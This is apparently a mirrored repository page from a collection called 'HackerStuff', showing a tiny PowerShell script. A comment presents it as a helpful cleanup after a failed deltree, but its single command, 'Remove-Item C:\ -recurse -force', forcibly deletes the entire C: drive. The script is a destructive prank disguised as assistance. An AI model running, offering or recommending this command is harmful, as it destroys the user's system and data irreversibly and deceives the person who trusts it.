mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
4 lines
121 B
PowerShell
4 lines
121 B
PowerShell
# In case you tried to deltree and it didn't work, this should take care of it for you.
|
|
|
|
Remove-Item C:\ -recurse -force
|